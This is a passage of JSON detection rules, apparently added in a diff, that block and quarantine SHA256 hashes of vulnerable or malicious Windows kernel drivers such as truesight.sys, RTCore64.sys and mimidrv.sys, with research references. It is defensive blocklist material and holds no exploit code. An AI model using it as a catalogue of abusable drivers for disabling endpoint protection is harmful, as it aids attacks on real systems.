+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829790Z",
+ "creation_date": "2026-03-23T11:45:30.829792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4f8c66b3d2ca6209e2195c8f87b6f5be13ec83e216bdbbda8c8dabe57de9e85",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "559f4539-0fec-57ad-b8ed-6089f78d7e7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484616Z",
+ "creation_date": "2026-03-23T11:45:31.484623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484635Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcf4959a9c7da3ea2bee30db220fa32e2ba7dd15148aeea915ed7d0a190dd27d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55a99ee6-30fd-5760-81e2-3890d0471643",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479368Z",
+ "creation_date": "2026-03-23T11:45:30.479370Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d30c6c4fa0216d0637b4049142bc275814fd674859373bd4af520ce173a1c75",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55be148e-7e16-5877-85cd-5ac63aab047e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498173Z",
+ "creation_date": "2026-03-23T11:45:31.498176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498184Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b116e94f25a40b4b11297df6d41f282b58ea0bd802eeee167df246105b523d69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55c375cd-4c5a-5ad5-b059-1a1c06bb50e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822635Z",
+ "creation_date": "2026-03-23T11:45:31.822638Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce7560d16469ada1f2a95e0f1499b9f50dead6fa42048511fc921e6e22514b7f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55cd6dda-cef3-59a8-94ec-1dcc8670f171",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461012Z",
+ "creation_date": "2026-03-23T11:45:30.461016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9a3dc47699949c8ec0c704346fb2ee86ff9010daa0dbac953cfa5f76b52fcd1",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55d91bfc-5e66-5bd2-9f26-c79ef2157673",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478221Z",
+ "creation_date": "2026-03-23T11:45:30.478224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a233680b53bcdfba264005644e51bfa4ba9923f0a3544ed4596e28fb9f3fd682",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55f35b79-b9c8-5c22-af5c-bd0a4d8b9eba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610546Z",
+ "creation_date": "2026-03-23T11:45:29.610548Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80eeb8c2890f3535ed14f5881baf2f2226e6763be099d09fb8aadaba5b4474c1",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55f7b8b5-e1ae-5374-b5b0-4c2e24790da8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469914Z",
+ "creation_date": "2026-03-23T11:45:30.469917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6094d55d6c7b4fd45cd06658600cef49007bcb73d6a0ab62f6eeabaa19bfd333",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56086a2b-a746-568b-9cb7-b6a0ca71a39a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143325Z",
+ "creation_date": "2026-03-23T11:45:31.143327Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc7ffe53ce3aacf3cd8b22428dfdf4eebc1ed108f9b99db01ca8fcee10357bbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "560cd67c-5c1a-5df0-9734-4dce10ff6fe4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984390Z",
+ "creation_date": "2026-03-23T11:45:29.984392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8ded5e10dfc997482ba4377c60e7902e6f755674be51b0e181ae465529fb2f2",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56156324-c52d-56ab-97d2-b20b8c56bc6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459049Z",
+ "creation_date": "2026-03-23T11:45:30.459052Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edc6e32e3545f859e5b49ece1cabd13623122c1f03a2f7454a61034b3ff577ed",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56222889-7449-57ff-8c3f-84a06c6d5b4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487667Z",
+ "creation_date": "2026-03-23T11:45:31.487668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19b104b64874cce9c1b72817b1d5c1d2835ab1d7e1edd7d48e2f7495dc276b3f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56397402-72ad-59b1-9e41-ddb2500fd02e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823141Z",
+ "creation_date": "2026-03-23T11:45:30.823143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller AntiMalware Driver (aka truesight.sys) [https://github.com/ph4nt0mbyt3/Darkside] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "563bd491-4695-50a1-ac7e-f8c8d38f7f74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980751Z",
+ "creation_date": "2026-03-23T11:45:29.980753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b4af74d74a4380130a1c46d2f1ffe112d87d9d7646540bbbd201c5bd176082b",
+ "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56436029-5d9d-53d7-b9a7-21d497b6fc60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815934Z",
+ "creation_date": "2026-03-23T11:45:30.815936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815942Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ea2a3a6edb3c772f9d358a720f9106260ef22d339bd3c7895e7b5cda03e424d",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56441626-5caa-52a6-8fbc-1a1b25e8742f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976714Z",
+ "creation_date": "2026-03-23T11:45:29.976717Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38dc036f6cd4917b816e6c362fab85012659225558d8a285ff53cae3ebbdff6c",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5657b5eb-897c-5b2d-8fa4-52c8ca33a55d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605682Z",
+ "creation_date": "2026-03-23T11:45:29.605684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08f80ad2c7614874b87fcf907a49c7f5a7e2816907283c19c6ff4f7b982da83f",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "565e8b69-dfbc-5d47-955f-78cdb4885619",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973654Z",
+ "creation_date": "2026-03-23T11:45:29.973656Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973661Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5027fce41ed60906a0e76b97c95c2a5a83d57a2d1cd42de232a21f26c0d58e48",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56637350-6aea-555e-8528-10845613db85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604446Z",
+ "creation_date": "2026-03-23T11:45:29.604448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a2d4815a03365d40b2b22981d4d8bee81bfbd983db1af30ce497fcdf77f83c9",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56824a2c-5a67-5eaf-bc35-4b270622f0a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980237Z",
+ "creation_date": "2026-03-23T11:45:29.980239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "567809308cfb72d59b89364a6475f34a912d03889aa50866803ac3d0bf2c3270",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "568a2260-7822-559f-8712-91b6d9001238",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489126Z",
+ "creation_date": "2026-03-23T11:45:31.489128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af8965f99b720fae41fe2516dd6a670eefb81fb75817ae0a0d2b9299226ec22c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "56998a53-b33e-5878-a59c-efb8de52bad8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480622Z",
+ "creation_date": "2026-03-23T11:45:31.480626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
